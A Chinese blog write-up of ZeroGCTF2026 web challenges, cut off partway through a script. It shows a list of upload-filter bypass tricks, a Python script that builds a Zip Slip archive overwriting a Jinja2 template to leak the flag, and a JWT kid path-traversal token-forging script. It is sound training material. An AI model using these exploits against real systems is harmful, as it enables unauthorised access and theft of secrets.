
  <!DOCTYPE html>
  <html lang="zh-CN"  >
  <head>
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_bq08450reo';window.REIMU_CONFIG.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.REIMU_CONFIG.code_block = {"expand":true};</script>
  
  <title>
    ZeroGCTF2026 |
    
    KL
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_bq08450reo.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="因为时间原因没打这个比赛，来复现几个觉得有意思的题   Web  Space Notes   存在模板注入 访问&#123;&#123;config&#125;&#125;拿到密钥伪造admin，访问Admin获取flag  Zero Upload(Zip Slip 路径穿越)   文件上传题，常见的有以下思路： 123456789101112131. .php32. .PhP3. 复写 PhP">
<meta property="og:type" content="article">
<meta property="og:title" content="ZeroGCTF2026">
<meta property="og:url" content="https://fub0y2026.github.io/2026/05/25/ZeroGCTF2026/index.html">
<meta property="og:site_name" content="KL">
<meta property="og:description" content="因为时间原因没打这个比赛，来复现几个觉得有意思的题   Web  Space Notes   存在模板注入 访问&#123;&#123;config&#125;&#125;拿到密钥伪造admin，访问Admin获取flag  Zero Upload(Zip Slip 路径穿越)   文件上传题，常见的有以下思路： 123456789101112131. .php32. .PhP3. 复写 PhP">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/ab0ecde81b6d10ede28807c7.png">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/e8d4d9e045136ff219d1e5fc.png">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/31000e3740cf96243ccfc329.png">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/8219c87d275e3cd6fb6214d9.png">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/bd0009678234ab38d11c00fb.png">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/28aada42039e62580a079958.webp">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/d618c6476f6c48e934f7eca8.webp">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/3a9b2b73b3fe25d1fcd1fe7e.webp">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/69184a26c919814f3636b0ea.webp">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/de69350510efdbe96f80424e.webp">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/7002efde61383e8a22eceeaa.webp">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/da8f295844c2eeec6d35b735.png">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/bb3e885a0815469e339e791f.png">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/bd188b6a92783b9668bc4c12.png">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/448155807eb0a6b0e8eefa12.png">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/d157824d2092f970aecefbb6.png">
<meta property="og:image" content="https://fub0y2026.github.io/post-assets/99507a530b155130dd7d5fb3.png">
<meta property="article:published_time" content="2026-05-25T15:08:58.000Z">
<meta property="article:modified_time" content="2026-05-26T13:27:09.532Z">
<meta property="article:author" content="FuB0Y">
<meta property="article:tag" content="比赛复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://fub0y2026.github.io/post-assets/ab0ecde81b6d10ede28807c7.png">
  
  
    <link rel="alternate" href="/atom.xml" title="KL" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
    
      
        
<link rel="stylesheet" href="https://npm.webcache.cn/katex@0.16.11/dist/katex.min.css">

      
    
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.0/dist/aos.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/">首页</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/archives">归档</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/about">关于</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/friend">友链</a>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅" target="_blank"></a>
    
    
    
  </nav>
</div>
<header id="header">
  
    <picture>
      
    </picture>
    
      <img fetchpriority="high" src="/images/banner.webp" alt="ZeroGCTF2026">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">ZeroGCTF2026</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content"  class="sidebar-right" >
          <aside id="sidebar">
  
  
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#web"><span class="toc-number">1.</span> <span class="toc-text"> Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#space-notes"><span class="toc-number">1.1.</span> <span class="toc-text"> Space Notes</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#zero-uploadzip-slip-%E8%B7%AF%E5%BE%84%E7%A9%BF%E8%B6%8A"><span class="toc-number">1.2.</span> <span class="toc-text"> Zero Upload(Zip Slip 路径穿越)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#orbit-apikid%E6%B3%A8%E5%85%A5jwt%E4%BC%AA%E9%80%A0"><span class="toc-number">1.3.</span> <span class="toc-text"> Orbit API(KID注入+JWT伪造)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ai"><span class="toc-number">2.</span> <span class="toc-text"> AI</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#safeassistant-dev-prompt-leak"><span class="toc-number">2.1.</span> <span class="toc-text"> SafeAssistant Dev Prompt Leak</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="FuB0Y" class="lazyload">
  <div class="sidebar-author-name">FuB0Y</div>
  <div class="sidebar-description">世所谓英雄者，不以挫抑而灰心，不以失败而退怯</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">382</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">13</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">323</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  <div class="sidebar-widget">
  
  </div>
</aside>

          <section id="main"><article id="post-ZeroGCTF2026" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2026/05/25/ZeroGCTF2026/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2026-05-25T15:08:58.000Z" itemprop="datePublished">2026-05-25</time>
    <time style="display: none;" id="post-update-time">2026-05-26</time>
  </a>
</div>

      
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/" data-aos="zoom-in">比赛复现</a>
  </div>


    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <blockquote>
<p>因为时间原因没打这个比赛，来复现几个觉得有意思的题</p>
</blockquote>
<h2 id="web"><a class="markdownIt-Anchor" href="#web"></a> Web</h2>
<h3 id="space-notes"><a class="markdownIt-Anchor" href="#space-notes"></a> Space Notes</h3>
<p><img src="/post-assets/ab0ecde81b6d10ede28807c7.png" alt="image-20260526202349386" /></p>
<p><img src="/post-assets/e8d4d9e045136ff219d1e5fc.png" alt="image-20260526203916206" /></p>
<p>存在模板注入</p>
<p>访问<code>&#123;&#123;config&#125;&#125;</code>拿到密钥伪造admin，访问<code>Admin</code>获取flag</p>
<h3 id="zero-uploadzip-slip-路径穿越"><a class="markdownIt-Anchor" href="#zero-uploadzip-slip-路径穿越"></a> Zero Upload(Zip Slip 路径穿越)</h3>
<p><img src="/post-assets/31000e3740cf96243ccfc329.png" alt="image-20260526204051242" /></p>
<p><img src="/post-assets/8219c87d275e3cd6fb6214d9.png" alt="image-20260526204116623" /></p>
<p>文件上传题，常见的有以下思路：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1. .php3</span><br><span class="line">2. .PhP</span><br><span class="line">3. 复写 PhPHPp</span><br><span class="line">4. .php[ 空格 ]</span><br><span class="line">5. .php.</span><br><span class="line">6. .php. .</span><br><span class="line">7. .php::$DATA</span><br><span class="line">8.  shell.php%00.jpg  </span><br><span class="line">9. 目标为 aphche 的话尝试先上传 .htaccess重新定义规则</span><br><span class="line"> AddType application/x-httpd-php .jpg    </span><br><span class="line">10. nginx 配置不当:http://target.com/upload/me.jpg/.php</span><br><span class="line"> Nginx 可能会把 me.jpg 当作 PHP 执行。  </span><br><span class="line">11. 尝试图片马二次渲染绕过</span><br></pre></td></tr></table></figure>
<p>但这里都不是，这里还有一个上传ZIP主题包的</p>
<p><img src="/post-assets/bd0009678234ab38d11c00fb.png" alt="image-20260526204741952" /></p>
<p>我们看附件,这里直接把题目的源码给我们了,我们白盒审计代码</p>
<p>发现定位一段 zip 解压逻辑</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">with</span> zipfile.ZipFile(zip_path, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> zf:</span><br><span class="line">    <span class="keyword">for</span> member <span class="keyword">in</span> zf.infolist():</span><br><span class="line">        target_path = extract_root / member.filename</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> member.is_dir():</span><br><span class="line">            target_path.mkdir(parents=<span class="literal">True</span>, exist_ok=<span class="literal">True</span>)</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">        target_path.parent.mkdir(parents=<span class="literal">True</span>, exist_ok=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">with</span> zf.<span class="built_in">open</span>(member, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> src, <span class="built_in">open</span>(target_path, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> dst:</span><br><span class="line">            dst.write(src.read())</span><br></pre></td></tr></table></figure>
<p>很明显存在 Zip Slip 路径穿越漏洞</p>
<p>照片墙模板 <code>&lt;font style=&quot;color:rgb(13, 13, 13);&quot;&gt;gallery.html&lt;/font&gt;</code> 中有这样一段：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for photo in photos %&#125;</span><br><span class="line">    &#123;% include &quot;theme/card.html&quot; %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>
<p>说明只要覆盖 templates/theme/card.html ,然后访问/gallery就能触发我们写入的 Jinja2 模板</p>
<p>我们开始构造恶意 card.html</p>
<p>因为应用中将动态 flag 放入了 Flask config：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.config[<span class="string">&quot;ZEROG_FLAG&quot;</span>] = FLAG</span><br></pre></td></tr></table></figure>
<p>所以模板中可以直接读取这个：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; config[<span class="string">&#x27;ZEROG_FLAG&#x27;</span>] &#125;&#125;</span><br></pre></td></tr></table></figure>
<p>恶意模板内容如下：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;div <span class="keyword">class</span>=<span class="string">&quot;photo-card&quot;</span>&gt;</span><br><span class="line">    &lt;h2&gt;ZeroG Theme Loaded&lt;/h2&gt;</span><br><span class="line">    &lt;p&gt;&#123;&#123; config[<span class="string">&#x27;ZEROG_FLAG&#x27;</span>] &#125;&#125;&lt;/p&gt;</span><br><span class="line">&lt;/div&gt;</span><br></pre></td></tr></table></figure>
<p>构造恶意 ZIP关键点是 ZIP 内文件名必须是<code>&lt;font style=&quot;color:rgb(13, 13, 13);&quot;&gt;../../templates/theme/card.html&lt;/font&gt;</code></p>
<p>我们生成恶意 zip</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> zipfile</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;&quot;&quot;&lt;div class=&quot;photo-card&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;h2&gt;ZeroG Theme Loaded&lt;/h2&gt;</span></span><br><span class="line"><span class="string">&lt;p&gt;&#123;&#123; config[&#x27;ZEROG_FLAG&#x27;] &#125;&#125;&lt;/p&gt;</span></span><br><span class="line"><span class="string">&lt;/div&gt;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> zipfile.ZipFile(<span class="string">&quot;evil_theme.zip&quot;</span>, <span class="string">&quot;w&quot;</span>, zipfile.ZIP_DEFLATED) <span class="keyword">as</span> z:</span><br><span class="line">    z.writestr(<span class="string">&quot;../../templates/theme/card.html&quot;</span>, payload)</span><br></pre></td></tr></table></figure>
<p>上传 zip 后访问照片墙<code>&lt;font style=&quot;color:rgb(13, 13, 13);&quot;&gt;/gallery&lt;/font&gt;</code>,就会得到 flag</p>
<p><img src="/post-assets/28aada42039e62580a079958.webp" alt="图片" /></p>
<h3 id="orbit-apikid注入jwt伪造"><a class="markdownIt-Anchor" href="#orbit-apikid注入jwt伪造"></a> Orbit API(KID注入+JWT伪造)</h3>
<p>访问<code>/api/docs</code></p>
<p>返回如图(这里 FeHelper 插件会自动美化 json)</p>
<p><img src="/post-assets/d618c6476f6c48e934f7eca8.webp" alt="图片" /></p>
<p>JWT header 里的 <code>&lt;font style=&quot;color:rgb(13, 13, 13);&quot;&gt;kid&lt;/font&gt;</code> 可能参与验签密钥选择</p>
<p><img src="/post-assets/3a9b2b73b3fe25d1fcd1fe7e.webp" alt="图片" /></p>
<p>解码 JWT Header,观察 kid<img src="/post-assets/69184a26c919814f3636b0ea.webp" alt="图片" />用 Python 解码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">import base64</span><br><span class="line">import json</span><br><span class="line"></span><br><span class="line">token = &quot;xxxxxxxxN1最帅嘻嘻嘻&quot;</span><br><span class="line">header_b64 = token.split(&quot;.&quot;)[0]</span><br><span class="line">header_b64 += &quot;=&quot; * (-len(header_b64) % 4)</span><br><span class="line">header = json.loads(base64.urlsafe_b64decode(header_b64))</span><br><span class="line">print(json.dumps(header, indent=2))</span><br></pre></td></tr></table></figure>
<p>发现使用算法<code>HS256</code>header 中有<code>kid = &quot;user.key&quot;</code></p>
<p>我们开始审计源码,这个地方发现 kid 漏洞</p>
<p>在<code>app.py</code>有</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">def read_key_by_kid(kid: str) -&gt; bytes:</span><br><span class="line">    key_path = KEY_DIR / kid</span><br><span class="line">    if not key_path.exists() or not key_path.is_file():</span><br><span class="line">        raise FileNotFoundError(&quot;key not found&quot;)</span><br><span class="line">    return key_path.read_bytes()</span><br></pre></td></tr></table></figure>
<p>验证 Token 的时候:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">def verify_token(token: str) -&gt; dict:</span><br><span class="line">    header = jwt.get_unverified_header(token)</span><br><span class="line">    kid = header.get(&quot;kid&quot;, DEFAULT_KID)</span><br><span class="line">    key = read_key_by_kid(kid)</span><br><span class="line">    payload = jwt.decode(</span><br><span class="line">        token,</span><br><span class="line">        key,</span><br><span class="line">        algorithms=[JWT_ALG],</span><br><span class="line">        options=&#123;</span><br><span class="line">            &quot;require&quot;: [&quot;exp&quot;, &quot;iat&quot;],</span><br><span class="line">        &#125;,</span><br><span class="line">    )</span><br></pre></td></tr></table></figure>
<p>可以看到服务器完全相信客户端传来的 kid,然后直接 <code>KEY_DIR/kid</code> 拼路径,没有过滤<code>../</code>存在目录穿越</p>
<p>也就是说,只要我在<code>header</code>把 kid 改成<code>../static/mission.txt</code></p>
<p>服务端就会去读</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/app/keys/../static/mission.txt  =&gt; /app/static/mission.txt</span><br></pre></td></tr></table></figure>
<p>访问<code>/static/mission.txt</code>接口</p>
<p>返回<code>ZeroG-Orbit-API-Public-Calibration-Key</code></p>
<blockquote>
<p>里注意行末有换行</p>
</blockquote>
<p><code>ctrl + s</code>下来很容易就能看到</p>
<p><img src="/post-assets/de69350510efdbe96f80424e.webp" alt="图片" />真正的 key 是<code>b&quot;ZeroG-Orbit-API-Public-Calibration-Key\n&quot;</code>(这里稳妥点的话可以用<code>request.get(...).content</code>,会自动保留<code> \n</code>)</p>
<p>这时候我们就可以来伪造管理员的 JWT 了</p>
<p>伪造一个 payload:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>,</span><br><span class="line">  <span class="string">&quot;role&quot;</span>: <span class="string">&quot;admin&quot;</span>,</span><br><span class="line">  <span class="string">&quot;iat&quot;</span>: 当前时间,</span><br><span class="line">  <span class="string">&quot;exp&quot;</span>: 当前时间 + <span class="number">3600</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>header 设置为:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="string">&quot;alg&quot;</span>: <span class="string">&quot;HS256&quot;</span>,</span><br><span class="line">  <span class="string">&quot;typ&quot;</span>: <span class="string">&quot;JWT&quot;</span>,</span><br><span class="line">  <span class="string">&quot;kid&quot;</span>: <span class="string">&quot;../static/mission.txt&quot;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后用刚刚拿到的<code>mission.txt</code>内容做 HMAC 密钥签名</p>
<p>:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> jwt</span><br><span class="line"></span><br><span class="line">BASE_URL = <span class="string">&quot;http://127.0.0.1:5000&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_public_key_material</span>():</span><br><span class="line">    r = requests.get(BASE_URL + <span class="string">&quot;/static/mission.txt&quot;</span>, timeout=<span class="number">10</span>)</span><br><span class="line">    r.raise_for_status()</span><br><span class="line">    <span class="keyword">return</span> r.content  <span class="comment"># 保留末尾换行</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">forge_admin_token</span>(<span class="params">key_material: <span class="built_in">bytes</span></span>) -&gt; <span class="built_in">str</span>:</span><br><span class="line">    now = <span class="built_in">int</span>(time.time())</span><br><span class="line"></span><br><span class="line">    payload = &#123;</span><br><span class="line">        <span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>,</span><br><span class="line">        <span class="string">&quot;role&quot;</span>: <span class="string">&quot;admin&quot;</span>,</span><br><span class="line">        <span class="string">&quot;iat&quot;</span>: now,</span><br><span class="line">        <span class="string">&quot;exp&quot;</span>: now + <span class="number">3600</span>,</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    headers = &#123;</span><br><span class="line">        <span class="string">&quot;typ&quot;</span>: <span class="string">&quot;JWT&quot;</span>,</span><br><span class="line">        <span class="string">&quot;alg&quot;</span>: <span class="string">&quot;HS256&quot;</span>,</span><br><span class="line">        <span class="string">&quot;kid&quot;</span>: <span class="string">&quot;../static/mission.txt&quot;</span>,</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    token = jwt.encode(</span><br><span class="line">        payload,</span><br><span class="line">        key_material,</span><br><span class="line">        algorithm=<span class="string">&quot;HS256&quot;</span>,</span><br><span class="line">        headers=headers,</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> token</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_flag</span>(<span class="params">token: <span class="built_in">str</span></span>):</span><br><span class="line">    r = requests.get(</span><br><span class="line">        BASE_URL + <span class="string">&quot;/api/admin/flag&quot;</span>,</span><br><span class="line">        headers=&#123;</span><br><span class="line">            <span class="string">&quot;Authorization&quot;</span>: <span class="string">f&quot;Bearer <span class="subst">&#123;token&#125;</span>&quot;</span></span><br><span class="line">        &#125;,</span><br><span class="line">        timeout=<span class="number">10</span>,</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] status:&quot;</span>, r.status_code)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] response:&quot;</span>, r.text)</span><br><span class="line"></span><br><span class="line">    r.raise_for_status()</span><br><span class="line"></span><br><span class="line">    <span 